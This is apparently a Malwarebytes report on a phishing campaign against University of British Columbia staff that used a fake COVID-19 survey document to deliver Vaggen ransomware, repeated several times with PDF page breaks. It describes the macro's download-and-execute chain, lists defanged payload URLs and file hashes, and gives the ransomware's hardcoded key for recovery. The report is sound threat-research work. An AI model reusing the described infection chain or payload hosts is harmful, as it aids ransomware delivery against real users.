3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 447 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. 
Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 448 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 449 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 450 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 451 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 452 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 453 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 454 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 455 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 456 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 457 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 458 of 
This post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed to the Silent Librarian APT group. 
On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.\r\nHowever, this attack and its motives differ from the ones previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, this attack was not successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net and DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto Box and DropBox and used the share functionality of these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a newly registered email address with a low reputation. In comparison, it is much more difficult to detect spam sent through file sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with us by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more. 
Please fill it out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!\r\nAccording to UBC, fewer than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required in order to download the file, since it was shared privately instead of publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target organization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nWhen the macro is executed, it does the following:\r\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following URL and writes it as Polisen.exe:\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following URL and writes it as Killar.exe:\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls the Shell function to execute killar.exe\r\nChecks the return value of the Shell function to determine whether the launch succeeded (on success, the return value is the task ID of the executed application)\r\nIf successful, it sends an HTTP GET request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends an HTTP GET request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use this type of service to get alerted when a particular event occurs.\r\nThis can be very useful as an early warning system that an intruder has had access to a network. 
In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment equivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go which starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir\r\nmain_ELDBJORT -\u003e main_encryptFile\r\nmain_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs, can be found here.\r\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with XXTEA (using the xxtea-go library). Each encrypted chunk is first decoded from Base64, then decrypted with the hardcoded XXTEA key (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is implemented as the callback of the standard Go library function filepath.Walk (package path/filepath).\r\nFiles are encrypted with AES-256 (32-byte key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
It uses a hardcoded key and a 12-byte nonce generated by CryptGenRandom. The file content is encrypted with the gcm.Seal function.\r\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12-byte nonce\r\nthe encrypted content\r\nthe 16-byte GCM tag\r\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take my heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that the malware author has not received any payment so far at this Bitcoin address.\r\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this attack can be recovered from fairly easily.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of adding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a very similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing attack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint a better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nIOCs\r\nVariant 1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant 2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\n
polisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant 3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant 4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant 5:\r\ntemplate.dotm\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\n
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 477 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 478 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. 
Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 479 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 480 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 481 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 482 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 483 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 484 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 485 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 486 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 487 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
